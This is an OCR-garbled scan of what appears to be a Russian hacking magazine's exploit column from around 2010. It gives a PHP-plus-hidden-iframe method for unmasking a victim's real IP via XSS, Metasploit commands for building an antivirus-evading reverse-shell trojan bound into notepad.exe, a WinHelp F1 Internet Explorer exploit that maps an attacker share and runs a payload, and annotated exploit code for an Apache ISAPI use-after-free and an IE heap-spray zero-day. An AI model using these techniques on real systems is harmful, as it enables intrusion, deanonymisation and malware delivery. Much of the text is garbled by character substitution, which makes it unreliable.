меЪтазкегсоЕЕее . сот 




2ір.ги 

Они покажуттебе стз, 
фрэймворки, языки, 
используемые на 
сайте со ссылками и 
описаниями. Быстро 
и просто, но частенько 
ошибаются, потому 
лучше использовать 
все вместе. 

Существует та кже 
аддон ѴѴарраІугег 
кГігеГох’у. Выводит 

чуть меньше информации, зато бол ее точно, так как база обновляется 
достаточно часто. 

Хотя алгоритм у них слабенький и скрыться от него не составляет труда. 
Можешьувидеть это на примере ѴѴарраІугег. Для этого нужно: 

1. Скачать Марраіузег. 

2. Переименовать в зір и разархивировать. 

3. Посмотреть файл «\сЬготе\сопкепк\оѵег1ау . дз». 



Алгоритм определения стз в ѴѴарраІугег 



№5 



ЗАДАЧА: ОПРЕДЕЛИТЫР-АДРЕС 
ЧЕЛОВЕКА. 



1 ^МогіІІа РігсГон 1 


Файл Правка Вид 


Журнал Закладки ІФіструменты Справка 




© ’ С • 


ЬЦр://де<Іоак.гх</г«рог(.ІЧтРса Ш±973(ИбЬ76аа139<Я7<іЗ<С0Р<Ье7>Рогіла(-<ех< 


"7] [1 В Контакт 


5кі5еая*. Щ Форум АНТ . НС Взлон УѴѳЬ ‘.ЩМеха»*он . 


ѴіпяТсІаІ * 



РЕШЕНИЕ: 

Очень часто появляется необходимость вычислить кого-то в Интернете. Сде- 
лаеттебе кто-то гадость — и оченьхочется его найти. Но это и просто, итрудно 
одновременно. Технологии Іср/ір и интернет предоставляют множество 
возможностей для анонимного серфинга, потому многоезависитотуровня 
пользователя, которого надо вычислить. Бел и те бе вычислять никого не надо, 
то эта информация будетполезнадлясохранениятвоей анонимности. 

О гра н и ч и м зада чу и уел ов и м ся , что требуется о предел ить I Р п ол ьзо вател я , 
который использует прокси и/или находится за ЫАТ. Технология такова. 
Используя социальную инженерию или, например, Х55 дырку в каком-нибудь 
сайте, мы подкидываем нашейжертвелинкна«наш»сервер. Жертва на него 
переходит и мы получаем ее ІР. Причем «нашим» сервером может быть, к 
примеру, тот же сервер сХ55-дыркой, приопределенныхусловиях. 

Ты, наверное, уже много читал статей отом, как получать РНР-за головки 
отзапроса пользователя и, анализируя их, узнать ІР пользователя. Ноэто 
все возможно, только если прокси не анонимный и человек находится не за 
ІМАТ’ом. Иначе — мы в обломе. Что же делать? 

Есть решение! И опять нам поможет Меіазріоіі. 

Аесли быть точнее, то их проект Бесіоак: ОеАпоуптігеб. 

Итак, все, что намтеперьтребуется — это найти хостинге поддержкой рбр (или 
аналогичного языка] и создать скриптпримернотакого вида: 

<?рПр $ІЙ=ШСІ5 ("ЫаЫаЫа" . $_5ЕКѴЕК [ ' КЕМОТЕ_АББК ' ] . 

$_8ЕКѴЕК [ ' КЕМОТЕ_РОКТ ' ] . кіше() . " ЫаЫаЫа "} ; 



2010-03-23 10 :2 6 : 3 1 . 673 12 , зслсс 
2010-03-23 10:2 6:36.334915, зос)сес,І 



. 162 . 58,0.0.0.0,0.0.0.0 

ВО. 162. 5В, О. О. О. О, Ш.ИО. 162. В 



Пример лога с ЬіІрУ/бесІоак.пеіУгерогЕЬітІ 



$1од= $іб . " - " . $_ЗЕКѴЕК [ ' КЕМОТЕ_АББК ' ] . " \г\п" ; 

$кр=кореп ( " іріод. кхк " , "а" ) ; //создаем файл на хостинге 
Ірикз ($1р, $1од) ; //заполняем его 
ксіозе ($Ер) ; 

?> 

<Ькт1хЬ.еасІхтека Ьккр-едиіѵ="Соп1:еп1:-Туре п сопкепк = "кех1:/ 
Ь±т1; с!іагзе1:=и1:к-8 " /> 

<кік1е>Мое фото</кік1ех/Ьеас1хЪос1у> 

<рхішд згс=" 001 . діЕ" місіиі=»200» кеід]ік = "153 " /х/р> 
сіЕгате згс=»]іЦЦр : //бес1оак.пеЕ/(Іес1оак.]іЕт1?сіс1=<?р]ір есЕю 
$ ісЗ. ; ?>&ѵгогЦ=0&іЕипез=0&диіскЦіте=0 " мібЕ]і="0" Ь.еідТі1і.= " 0 " 
зсго11іпд="по І, х/іЕгате> </Ьойу></Ь.кт1> 

В итоге, жертва, заходя на да иную стран и цы, будет видеть поставленный 
тобой рисунок, а браузер в скрытом фрэйме передаст необходимую информа- 
цию на бесЬактеі/бесЬ^ ІРжертвыты сможешь получить зайдя на 

сІесІоак.пеЕ/герогЕ .ЬЕт1?сі(1хипісіс1>&ЕогтаЦ=ЦехЦ 

Где < и піеіеі > — это уникальный 32 байтный ібдля идентификации запроса. 

Его ты можешь взять из файла іріод. Іхі, который логи руется скриптом в виде: 



► 040 
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б50712Ъ92с93Ъ98б063735612а6Ъ78еай®27 .0.0.1 
уникальный ій — ІР жертвы, при коннекте 
&ѵтог й= 0 &і кипе з = 0 &диі скк ігпе = О 

Данная строка взапросеограничиваетнекоторыетехнологии, используемые 
бесіоак’омдля определения ІР-адреса, но которые избавляют от палева в 
виде запроса на скачку файла или окошка обустановке плагина. 

Если тебе требуется разово узнать ІР, например, через Х55, то надо запихнуть 
на уязвимый сайттолько, подставив 32-байтный набор символов из головы: 

сіігаше згс=1іккр : / /йесіоак . пек/бесіоак . ккт1?сіб=<ипісіб>&могб=0& 
ікипез=0&диісккіте=0 тйЫі=0 кеід]пк=0 зсго11іпд=по></іігаше> 



Апотом ручками вытащить инфу поданному Ю. 

Чтобы наш скриптбыл более неприметным, стоит заменить его расширение 
на ]ред, например, а в .Ыассезз на сервере выставить директивы, чтобы іред- 
файлы воспринимались какрбр. 

АййНапйІег арріісакіоп/х-йккрсі-ріір .бред 

Кстати людям, пользующимся Тог-ом, можно не беспокоиться о поддержа- 
нии свой анонимности в сети — при стандартных настройках используемые 
методы не смогут обнаружить ваш настоящий ІР-адрес. 

Описание используемыхтехнологий, эта кже примеры реализации, если 
захочешь сделать полностью свой деанонимайзер, можешь почитать на 
бесіоак.пек 




ЗАДАЧА: С03ДАТЫР0ЯН , КОТОРЫЙ НЕ 
ОБНАРУЖИВАЕТСЯ АНТИВИРУСАМИ. 



РЕШЕНИЕ: 

Затроянить кого-нибудь — дело хорошее и нужное. Но очень часто антивирусы 
мешают. Старые, проверенные средства жестко палятся. 

Путей решения это проблемы несколько. 

1. Взять старый троян и воспользоваться каким-нибудь криптором. Но анти- 
вирусные конторы следятза появлением паблик-крипторов, потому выжать из 
этого можно немного. 

2. Взять исходник чужого трояна и изменитьего. 

3. Написать свой троян, как говорится, «с нуля». Это путь долгий и тернистый, но 
даст почти 100% результат. 

4. Чтобы не перетруждать себя и заняться другими полезными делами, восполь- 
зуемся следующим методом. Нам потребуется МеіазрІоіС 

У МеІазрІоіЕа есть одна приятная возможность: использовать его не полностью, 
а только какие-то его части. Что, к примеру, позволяет использовать шелл-коды 
МеІазрІоіЕа с эксплойтами, которых в нем нет. 



тзкрауіоаб тпбсжз/зЬе11/геѵегзе_кср ЬН08Т=192 . 168 . 146 . 128 ,Ь 
РОКТ=5555 X > геѵегзе.ехе 



Здесь, не запуская пп^зсопзоіе, мы сразу из консоли обращаемся к модулю 
МеІазрІоіЕа с рауіоаб’ами. 

И создаем ехе-шникс шеллом, который послезапуска подконнектится на 5555 
портхоста с 192.168.146.128. “X” —указывает модулю, что на выходе должен быть 
получен ехе-файл. Также поддерживаются: 

С - код на языке СИ 
Р - код на Регі 
И - код на ЦаѵаЗсгірк 
V - код на ѴВА 
у - код на КиЬу 
К — машинный код 

Троян готов. Создаем сервер, куда будет коннектиться наш шелл. Для этого пишем: 

тзксіі ехріоік/тиікі/йапсііег РАУЬ0АБ=тпскжз/з]іе11/геѵегзе_ 
Сер ЬНОЗТ=192 .168.146 .128 ЬРОКТ=5555 Е 

Где ппзіеіі — интерфейс командной строки МеІазрІоіГа. 

Теперь, послезапуска геѵегзе.ехе жертвой, его комп подключится к нам на 5555 и 
мы получим консольный доступ с правами жертвы. Все бы хорошо, но сигнатуры 
большинства стандартных рауіоасі’ов МеіазрІоіЕа есть почти во всехантивирусах. 
Их не добавил, наверное, только самый ленивый. Потому геѵегзе.ехе определяется 
аж21 антивирем из 41, что показываеттестсѵігизЫаІ.сот (см. скриншот]. Что же 
делать? Воспользоваться еще одним модулем МеІазріоіГа — тз^епсобе. Если по- 
простому, то он изменяет разными способами код шеллов и эксплойтов, чтобы те 
не обнаруживалисьантивирусами, чтобы затруднить реверс-инжиниринг. 

Для нашей задачи отлично подходит. Пишем: 

шзірауіоаб тпбсжз/з1іе11/геѵегзе_кср ЬНОЗТ=192 . 168 . 146 . 128 ,Ь 
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Тестирование геѵегзе.ехе. Обнаружен 21 антивирусами из 41 

РОКТ=5555 К | тзкепсобе -с 5 - е х86/зЬ.ікака_да_паі -х покераб. 
ехе -к ехе > геѵегзраб.ехе 

Здесь модуль тзфауіоаб используется аналогичным образом, но итоговый 
формат — машинный код, который может воспринимать тз^епсобе. 

Параметры: 

-с5-ех86/зЫкаіа_да_паі — (5 раз] мы закодируем наш шелл методом зЫкаіа_да_паі: 
-хпоіерасі.ехе — тз^епсобе совместит наш шелл -код с какой-либо другой 
программкой. Для примера, не забудь кинуть поіераб. ехе в папку, из которой 
запускаешь команды. 

-I — задает выходной формат, т.е. ехесіЛаЫе. 

Совмещение файлов происходит следующим образом. Мз^епсобе — читает 
РЕ-за головок файла, к которому мы прикрепляем наш код, находит Техі секцию 
и добавляет в нее наш код. Затем меняет входной адрес для ехе-шника, потому 
сначала запускается код. 

В итоге мы получаем следующие бонусы. Во-первых, рабочий шелл-код, во-вто- 
рых, полученный геѵегзраб.ехе будетточь-в-точь похож на поіераб.ехе. То есть 
ярлычок, информация о производителе и размер до байта будут одинаковыми. 
Разница будетзаметна только если посмотретьхеш файла. И, самое главное, 
большинство антивирусов не смогут теперь определить наш троян. Если точнее, 
то геѵегзраб.ехе определяется каквирьтолько двумя антивирусами (см. скрин- 
шот]. И это только начало, если помучить тз^епсобе, то можно получить и куда 
лучшие результаты, □с 



Тестирование геѵегзраб. 
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I Алексей Синцов, □ і д И: а I Зесигііу сіоокіе@іпЬох.ги 
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ЬИІ +■ 1 іЛЫк«<М *'рй9 1 г-в01к^ ^ |Я ^ П ^ 



Поймал себя на том, что мой АсгоЬаІ Реасіег вовремя не обновляется. 



С: , А 


г.^<КѴугчЬ«п Іпмиііел^ПшЦ, - Мегирт (И— ^|і 
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Орікиіі г * Оін№4( 


Ггмп ІМІОГГ ІІМіЦпіЫі 

Т* ѴЧ* Оі*Ѵг 

Сс 

*іиО|ггі 




іѵгл тйло/люіхАм 


і т ' ЛИО ітмыдеч ІГтМКЛ.ГІКМ р<Я 



МІлсЬссІ І8 ІІіс сору оГ (Не Гошм К шѵіШІоп Іеіісг шкі 
гсзропвс СШІ. 

МсатѵЫІе ѴѴс Ьаѵс ксгкі уои іЬс Гогтаі іпѵігаііоп ІсПсг 
Ьу рОЙІ 

ассогдшд Іо уоиг согтсзропсіепсе шкігезз. РІсазс сіісск 
уошг шаіІЬох т іЬе 
асхі Гс\ѵ сіауз. 



$іпссгсІу уоигз 
І5І<1оге 



Вот такие письма ходили от китайскихтоварищей. 




ВЫПОЛНЕНИЕ ПРОИЗВОЛЬНОГО КОДА 
В БРАУЗЕРЕ ІИТЕРМЕТ ЕХРЮКЕК 



ГАВ6ЕТ5 



• I пТегпеТ Ехріогег 7/8 

• ѴѴіпсІоѵѵзХР 

• ѴѴІпсІоѵѵз 2000/2003 



Достаточно забавная уязвимость была обнаружена Маурицием 
Продеусом (Маигусу Ргосіеиз], эксплуатирование которой приводит к 
выполнению произвольного кода через браузер I пТегпеТ Ехріогег. Суть 
ее сводится ктому, что используя функцию МздВохО, при использова- 
нии Ѵізиаі Вазіс-скрипта, можноуказать в качестве параметра этой 
функции путь кактивному .Ыр-файлу. Этот файл будет открыт, если на- 
жать клавишу <Р1 > в момент работы МздВохО. Сам файл может при этом 
находиться, например, на шаре или в директории ѴѴеШАѴ. Выполнение 
кода происходит потому, что в этом самом .Ыр файле могут содержаться 
макросы, например ЕхесРі 1е(] . 




КОР в деле. 



ЕХРЮІТ 



Эксплуатировать уязвимость можно, используя соответствующий модуль 
метасплойта. В та ком варианте шелл код соберется в исполняемый файл, 
и запустится средствами НЕР макроса при нажатии <Е1 >. Единственный 
минус — так как получившейся бинарный файл не является доверенным, 
то есть подписанным, то после нажатия клавиши пользовательувидит 
недружелюбное окно с вопросом на тему, что сейчас, мол, какой-то ис- 
полняемый файл запускаться вздумал, не соизволите ли разрешить/за- 
претить это безобразие. Чтобы опробовать сие чудо, достаточно найти в 
метасплойте модуль іе_\л/іпЫр32. Выбирая настройки, нужно учесть, что 
данный модуль будет работать толь ко на 80 порту, а путь ЭРІРАТН должен 



быть «/». В противном случае эксплойт будет ругаться. Все хорошо, но 
вотэто окно с предупреждением о недоверенном исполняемом файле 
портитвсю малину. Немного пораскинув мозгами, я придумал способ, 
какубрать это окошко. Моя идея заключается в том, что окошко исчезнет, 
если макрос в НЕР-файле не будет сразу запускать ЕХЕ, а сначала будет 
подключен сетевой ресурс как сетевой диск. Для этого придется создать 
свой НЕР-файл. Нам понадобится МісгозоГС Неір ѴѴогкзбор версии 
4 (есть на диске]. Для создания НИР-файла первоначально нужно 
создать РТР-файл, например в ѴѴогсГе. В него нужно добавить сноски 
(Вставка ->Ссылка->Сноска]. Символ сноски имеет самое непосредс- 
твенное значение. Создай сноски: ‘$2ЕО’, ‘# ЮН_1’ — заголовоки 
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ГГ 5всигЕГу А-гіѵііагу (9В1 1 69): ѴнГпегаЬШЕу іл ѴН&сгір! СоиШ АН 



- С X А С Г 

ИнферилпЛФйд б^і .. ,1і' ДкелѴлА - ТЬвОреп ... і.’’ 5ки«>ТЪсік ІН1 інМЗні - ія* *Ді і ѵи_ ІН й_] 5мийуіА,іи г ХмЗрлкабр:: кйіикт... 



^ МГочиоГЕ 5«(ГПр ДгіѵВвгу [9ЯІ 1 Б^г. 



«гічэ V \ с»с1і 'ТАгІ лй* г»чѵі ЛІО ріі . *х*" /I /Р іѵег 



МОЖНО ЕЩЕ ЛУЧШЕ - ВЫКОВЫРЯТЬ КЛАВИШУ И РАЗ- 
ДАТЬ ТАКУЮ КЛАВИАТУРУ СОТРУДНИКАМ. ОТЛИЧНЫЙ 
ПАТЧ БУДЕТ 




0 Г гециепііу Аькей див^Ііопк 
0 Мііідеііяд Расіог* 

Р ЧѴ огк-агои пгі 5 

Жвгкагоипі геГегг № а мСЬпд ог еепЛдчгаІівп еНапда іЬл* (Гм* пві »г«й (Ье чпЛаг!» іпд іяиа ЬиІ чеі. 
ицлаіа. МіспмеЙ. На* іЬе ЫІопіпд «егкаглипй* імі Каіаі л Им Ніісиізіеп иЬаЛаг а ^агкагеип 

1>р Лніі ргр*» Им РІ Ьеу яМй ргатрЬйй Ьу а ШеЬ тііг 

5д«о«'Ы п*ркиГ*«оп аГ -гиІгчгаЬіИ? «ФяГМ *ЪаЬ и«г* і**іЯ*Кп вжрМ Ь* рг***лд вч Р1 к«у 
ааі рга« *Ье П к*у м №еіг кетЬмг^ *Ье ѵдІмгаЫіГт рапарі Ьа ехрМеП. 

СсгцсчиепНгл таІ>сіои« *І4М тацг аПетрГ [д рспиаЛ? чіег* іщ» ;гс«;тд Йч Я кеу, 5иеЬ а Щ* 
1*11 Ич д;ег рг«і Вч Ч кву Ьэ зт* Йч Ітер, рг (Жег іц!ч«тлв№» іисЬ 4? рпсич іі^опл«іоп ог НйІ 

иіаг* «па ш4<т*4 (р аѵрій ргс^іпд РІ ргди-Мсй Ьу *сЬ рада* ог «Учг ІпГчглеІ дрп^спЦ. I? « йчіод Е 
и»г № рг«и П, шеп тау Іод нН (Гі« &у*1*т ог и** Тмк Мападаг Го ГігпипіК* ГЬе ЗпГ*гтчГ Екріогаг 

Асіігісі іісніЪі Им Ѵіпіівпі Неір МгШт 

5исс«*ГиІ ахр^мГаГіоп оР (Ьіі уиІпагаЬікГу гачиігѵ; ГНаНЬа ЖігкГриі ноір 5 у Пат и Гипгіюптд. Той с 
ІР у со линій* іЬа АСІ оп «іпЫрЭ2.*хе Іо Ьа тога па&ГгнЗіѵе ап ІНкиіеи:* 2000, Шіпйоиі КР аосі ѴГІпИ 
Ргот ап агітмиЯгайѵа «мптапгі Іш« : 



Делаем сноски 



•ЮН 1 

*2Ш 

'21 0 

' ЕхесЕі1е(ст<І г с п«и$е2: \\\\10.83.144.26‘ іігес) 
’ ЕхесРі1е(ст<і, с \ѵ5сгірт г:\\ехес.ѵЬ$) 



Раде: 1 оТ 1 Шогсіі: 8 ЕпдІпЬ (ІР.5.) 



П - помощь в получении шелла 



идет имя макроса с параметрами. Допустим, мы создали сетевой ресурс 
Ргее, и наш ІР — 10.10.10.10. Тогда добавимтакие сноски: 

! ЕхесРіІе (стсі, /с пеС изе 2 : \\\\10 . 10 . 10 . 10\\^гее) 

! ЕхесРіІе (стсі, /с ѵ^зсгірС 2 : \\ехес . ѵЬз) 

Таким образом, эксплойтсначала подключит сетевой диск, а потом без 
всяких вопросов запустит скрипт ехес.ѵбз. Содержимое ехес.ѵбз: 

Біш МзЬ.ЗЬ.еІІ , оЕхес 

ЗеС ШзЬЗЬеІІ = ^зсгірС . сгеаСеоЬз есС ( "ѵ^зсгірС . вііеіі " ) 

ЗеС оЕхес = ШзЬ.ЗЬе11 . Ехес ( " 2 : \г1о . ехе " ) 



Для компиляции ШР-файла, создаем проект в Місгобо^ Неір ѴѴогкзбор, 
жмем кнопку Рі Іе, добавляем наш РТР. Затем жмем кнопку Мар и до- 
бавляем запись: ЮН_1=1 . После этого жмем на верхней панели кнопку 
Сотрііе — в итоге должен получиться файл с расширением .Ыр. Теперь 
создаем ресурс Рее, выкладываем туда НІ_Р, ЕХЕ и ѴВ5 файлы. Ну и на- 
конец, самое интересное — тело эксплойта, предложенного Маурицием: 

<ТШт1> 

<зсгірС Еуре=" СехЦ/ѵЬзсгірЦ " > 

Ьід = " \ \ 10 . 10 .10 .ЮХЕгееХЕХЕС.НЬР" 

МздВох "ріеазе ргезз РІ Со заѵе СЬе ^огісі" , , 

"ріеазе заѵе СЬе ѵгогісі" , Ьід, 1 

МздВох "ргезз РІ Со сіозе ВЬіз аппоуіпд рорир" , , " " , 

Ьід, 1 



Данный скрипт за пускает исполняемый файл. Но зачем нужен скрипт, 
когда можно сразу запустить файл? Если шеллкод метасплойта пере- 
делать в исполняемый файл, и запустить средствами макроса, то он 
не отдаступравление консоли, и в итоге пользователь после загрузки 
шеллкода увидит черное окошко стб.ехе, которое будет висеть, 
пока процесс не будет закрыт. Если запускать через скрипт, то тогда 
ѵѵзсгірі: не даст«захватить» консоль, создав для шеллкода свой про- 
цесс, и все что увидит пользователь, если вообще заметит — мигание 
стб.ехе. Теперь, собственно о том, как из шеллкода сделать исполня- 
емый файл. Очень просто — загружаем судѵѵіп консоль метасплойта и 
выполняем: 



</зсгірВ> 

</ЪЬт1> 

Если пользователь нажмет <Е1 > во время появления сообщения о 
спасении мира, можно смело подсоединяться на 4444 порте целью по- 
лучения шелла. Параметр Ьід указывает на наш НЬР файл, а следующий 
параметр, единица, номер контекста (помнишь, мы делали ЮН_1=1 ?). 



50ШТІ0М 



Официальное решение от компании М іеговой — не нажимайте <Е1 >. 
Крометого, предлагается отключить систему помощи: 



тзірауІоаЬ міпЬомз/зЬе11_ЬіпсМіср ЬРОКТ=4444 X > гіо.ехе есЬо У I сасіз " %міпЬіг%\-міпЬ1р32 . ехе" /Е /Р еѵегуопе:Ь 
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Метасплойт подсуетились, отличный о-сіау для ІЕ6/7- 



Нелишним будет установить для зоны Интернет повышенный уровень 
безопасности. Сделать это можно в настройках Іпіегпеі: Ехріогег (Сер- 
вис- > Свойства обозревателям Безопасностью Интернета Высокий]. 

ИСПОЛЬЗОВАНИЕ ОСВОБОЖДЕННОЙ 
ПАМЯТИ В МОДУЛЕ АРАСНЕ І5АРІ_ 
МООІЛ-Е 



ГАВСЕТ5 



• Арасбе <= 2.2.14 

• ѴѴіпсІоѵѵзХР 

• ѴѴіпбоѵѵз 2000/2003 

Модуль ізарі известного веб-сервера Арасбе для платформы ѴѴіпбоѵѵз 
служит для использования расширений, написанных под веб-сервер 
N5. Данный модуль подключен к серверу по умолчанию. Для успеш- 
ной эксплуатации уязвимости необходимо, чтобы хоть какое-нибудь 
расширение былоустановлено. Само расширение представляет собой 
специальную Б І_І_- библиотеку, которая может находиться, например, в 
папке сді-Ьіп. В конфиге апача должен быть установлен соответствую- 
щий обработчикдля ОСЕ файлов: "АсИНапсИег ізарі-бапбіег .611". Если 
целевой сервер обрабатывает І5АРІ- расширения, то он может быть 
успешно захвачен, так как в этом модуле присутствует ошибка использо- 
вания памяти после освобождения. Суть втом, что если послать запрос 
к ІЭАРІ-расширению и оборвать сессию (ВЕ5ЕТ-пакетом],то выделен- 
ная под модуль память освободится, ноуказатель на нее сохранится. 

При повторном запросе, модуль ізарі, увидев, что указательу него есть, 
перейдет по нему, несмотря на то, что в памяти по данному адресу может 
быть что угодно. 



ЁХРІОІТ 



Баг-хантер БрэтЖервазони (В геи Оегѵазопі], написал эксплойт, 
который реализует данную уязвимость. Эксплойт посылает Р05Т-за- 
прос к ІЗАРІ- расширен ию и тут же рвет сессию, затем немного ждет, 
дабы выделенная под расширение память могла освободиться, и 
шлет второй пакет к то му же расширению. Но второй пакет не прос- 
той, он с кучей больших псевдо-ЫТр-заголовков. В этих псевдозаго- 
ловках находится много буковок А (0x41 — I N С ЕСХ: семантический 
N О Р] и шеллкод. Суть в том, что для этих заголовков нужна память, 
и вполне вероятно, что эти заголовки запишутся туда, где раньше 
располагалось расширение ІЗАРІ. Это приведет ктому, что когда 
модуль попытается перейти по сохраненному адресу, то он попадет 
на шеллкод из псевдо-заголовков. Сложность эксплуатации в том, 
что для каждого расширения придется подбирать свой размер и 
количество псевдозаголовков, но эта задача решается методом гру- 
бой силы или, если есть доступ к расширению, дебаггером. В случае 
успеха, шеллкод создаеттекстовый файл зоз.М в директории апача. 



ЕХРЮІТ5 




ЕХРЮІТ5 


РЕѴІЕѴѴ 




РЕѴІЕѴѴ 




ЕХРЫІТЗ 

РЕѴІЕѴѴ 



Текстовый файл содержит одну строчку: "рѵѵп-ізарі". Разумеется, 
шеллкод можно заменить на более полезный. Разберем ключевые 
места кода эксплойта подробнее: 

//входные параметры 
зегѵегІР = зРгіпд (агдѵ [1] ) ; 
ізаріБЫі = зРгіпд (агдѵ [2 ] ) ; 

/ /Готовим много буквок 'А' 
тетзеР ( ассерр , 'А', 170); 
тетзеР ( геРегег , 'А', 732); 
тетзеР (соокіе, ' А' , 5375); 
тетзеР (гапсіот, 'А', 7 603); 
тетзеР (розРБаРа , 'А', 23378); 
тетзеР ( РооРег, ' А' , 2 98); 

//Первый запрос к расширению 

РгіддегѴиІп = "РОЗТ /сді-Ьіп/" + ізаріБЬЬ + " НТТР/1 . 0\г\п" 
"Ьзег-АдепР : АААААААА\г\п" 

"Ргадта: по-сасЬе\г\п" 

" Ргоху-СоппесРіоп : Кеер-АІіѵе\г\п" 

"НозР: " + зегѵегІР + " \г\п" 

"СопРепР-ЬепдРЬ : 40334\г\п\г\п" + 
зРгіпд ( РооРег ) ; 

//Второй запрос 

рауіоасі = "РОЗТ /сді-Ьіп/" + ізаріБЬЬ + " НТТР/1 . 0\г\п" 
"АссерР: " + зРгіпд ( ассерр ) + "\г\п" 

" Ргоху-СоппесРіоп : Кеер-АІіѵе\г\п" 

"ОкуРиазЬ: " + зРгіпд (соокіе) + зРгіпд ( зЬеІІсоЬе) 
+ "\г\п" / /пошли псевдо-заголовки и шеллкод 
"АзЬазЬазЬазЬазЬ: " + зРгіпд (гапЬот) + 
зРгіпд ( зЬеІІсоЬе) + " \г\п" 

"АзЬазЬа: " + зРгіпд (гапЬот) + 

зРгіпд (зЬеІІсоЬе) + " \г\п" 

" ЗешллеРЬиі : " + зРгіпд (гапЬот) + 

зРгіпд (зЬеІІсоЬе) + " \г\п" 

"ОЬРазЬегпи : " + зРгіпд (гапЬот) + 

зРгіпд ( зЬеІІсоЬе) + " \г\п" 

"СЬРРеіАГ-азЬР : " + зРгіпд (гапЬот) + 
зРгіпд ( зЬеІІсоЬе) + " \г\п" 

" СопРепР-ЬепдРЬ: 25054\г\п\г\п" + 

зРгіпд (розРБаРа) + "СССС" + 
зРгіпд ( зЬеІІсоЬе) + "ВВВВ" + зРгіпд ( РооРег ) ; 

// конец запроса 



/ /сгеаРеСоппесРіоп - устанавливает соединение 
ІР (сгеаРеСоппесРіоп (зегѵегІР, ЗЕКѴЕК_РОКТ) == 1) 

{ 

ргіпРР (" - ап еггог оссиггеЬ соппесРіпд Ро РЬе 
зегѵег\п" ) ; 

геРигп 1 ; 

} 

1іпдег_ЬаРа . 1_опоРР = 0; 

1іпдег_ЬаРа . 1_1іпдег = 0; 

/ /Так автор хочет сделать ВЕЗЕТ 
зеРзоскорР (зоск, ЗОЬ_ЗОСКЕТ, 30_ЬШСЕВ, 
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ЕХРШІТ5 

РЕѴІЕѴѴ 
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І\І_ѴІІ_ѴѴ 






ЕХРЮІТ5 

РЕѴІЕѴѴ 




5 




І\І_ V ІІ.ѴѴ 





І5АРІ ехріоіі. Совершенно безобидный шеллкод 



(сбаг* ) &1іпдег_с1аба , зігеоб ( 1іпдег_с1аба) ) 
зебзоскорб (зоск, 50Ь_30СКЕТ, 30_Б0ЖЪШСЕК , 
(сбаг* ) &1іпдег_с1аба , зігеоб ( 1іпдег_с1аба) ) 



зепбТгапзтіззіоп ( бгіддегѴиІп) ; //Шлем первый пакет 

31еер(2 000) ; //Ждем 2 секунда, что бы Арасбе успел про- 
глотить первый пакет 

ШЗАСапсеІВІоскіпдСаІІ () ; //И отвечаем ЕЕЗЕТ пакетом 





Встречаем Осіау. Девятого марта появилась новостьотом, что злостные 
нарушители активно эксплуатируют неизвестную уязвимость в браузе- 
рахтипа ІЕ 6/7. Уже через день в коллекции метасплойта появился экс- 
плойт, который реализуетэту уязвимость. Сутьуязвимости скрывается 
в библиотеке браузера іереегз.сИІ, которая, какстало последнее время 
модно, не может уследить за указателем на объект. 



ЕХРЮІТ 



Эксплойт полностью основан на «реальных событиях», то есть на 
коде, который был найден по наводке сотрудников МсАітее, кото- 
рые спалили в своем блоге домен сайта распространителя заразы 
\лллл/ѵ.Іоріх21сеп1:иіусот. Код был деобфусцирован и переписан под 
метасплойт. Что характерно, патча, закрывающего брешь, в момент 
написания этих строк не было (на то оно и Осіау]. Рассмотрим ключевые 
места эксплойта: 

<Ъиббоп і<3= ' бгідд ' опс1іск= ' аббаск ( ) ; ' 
збу1е= ' бізріау : попе ' ></Ьиббоп> 

<зсгірб 1апдиаде= ' ^аѵазсгірб ' > 
бипсбіоп аббаск ( ) 

{ 

беар_зргау ( ) ; 

//Стандартный беар-зргау, забиваем память шеллкодом 
ѵаг обд = босшпепб . сгеабеЕІешепб ( 'бобу ' ) ; 

//Создаем любой элемент 
оЬз . асМВебаѵіог ( ' #бебаи1б#изегБаба ' ) ; 
босшпепб . аррепбСбіІсІ (об} ) ; 

//Добавляем созданный объект 

//Уязвимость тут 
бог (і = 0; і<10; і + +) 

{ //сдвигаем указатель... 

обд . зебАббгіЬибе ( ' з ' ,міпсклл) ; 

//...устанавливая несуществующие атрибуты 

} 

тпбсж. збабиз+= ' 1 ; 

//объект міпскжз указывает на шеллкод из кучи 



//Далее закрываем сокет, очищаем структуры, и по новой 
//организуем соединение 



зепбТгапзшіззіоп (рауіоаб) ; //Шлем второй РОЗТ запрос с 
псевдо-загловками и шеллкодом 

Автор предупреждает, что данный эксплойт не будет работать с вирту- 
альной машины, и против ЭЕР. Если цель находится подзащитой ЭЕР.то 
в итоге будет простой Эо5. 



50ШТЮЫ 



Установить версию веб-сервера 2.2.1 5. Конечно, если не используются 
ІЭАРІ-расширения, то бояться эксплойта не стоит. 



} 

босшпепб . дебЕІешепбВуІб ( ' бгідд ' ) . опсііск ( ) ; 

//начало 

} 

</зсгірб></бос!у></ббт1> 

Детали самой уязвимости не распространяются, но как можно понять 
из кода эксплойта, атакующий способен подменить указатель объекта 
ѵѵі псіоѵѵ, в итоге последующее обращение кнему выйдетбоком. 



50ШТЮЫ 



Решения проблемы для владельцев ІЕ6/7 — ОЕР Это конечно не панацея, 
но отэтого эксплойта спасет. Крометого, лучше перейти на последнюю 
версию браузера. I пбегпеб ЕхрІогег8 не подвержен данной уязвимости. А 
также ждем заплатки от Місгозоб, которая должна закрыть эту дыру. 




ИСПОЛЬЗОВАНИЕ ОСВОБОЖДЕН- 
НОЙ ПАМЯТИ В БРАУЗЕРЕ ШТЕВМЕТ 
ЕХРЬОВЕВ 




ПЕРЕПОЛНЕНИЕ БУФЕРА В ЫВТІРГ 
АСРОВАТ ВЕАОЕР 



• I пбегпеб Ехріогег 6/7 

• ѴѴіпсІоѵѵз ХР/Ѵіэба 

• ѴѴіпбоѵѵз 2000/2003/2008 



ГАВСЕТ5 



• АсгоЬаі Реабег9.0-9.3/8.0-8.2 

• ѴѴі псІо\л/5 ХР/Ѵізба 

• ѴѴіпбоѵѵз 2000/2003/2008 
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ЕХРЮІТЗ 
Г ЕѴІЕ <1 



ЕХРЮІТЗ 

РЕѴІЕѴІГ 






Ц г~ 






гшз 

Формат РБЕ постоянно исследуется на предметтого, что же можно в 
него такого засунуть, чтобы при открытии оного выполнился произ- 
вольный код. За последние два года для АсгоЬаІ Реабегбыло напи- 
сано больше эксплойтов, чем для любого другого продукта за этотже 
период. Конкурировать пытается только лишь Еіазб. Объясняется это 
тем, что злоумышленников интересует надежный способ «затрояни- 
вания» несчастных пользователей интернета, а формат РОР — самый 
ходовой. В феврале 201 0 людям стали приходить подозрительные 
письма с вложенным РОР файлом. Исследователи начали препариро- 
вать такие файлы, дабы понять, в чем же суть. 



ЕХРЮГ 



В результате операции был получен новый эксплойт для 
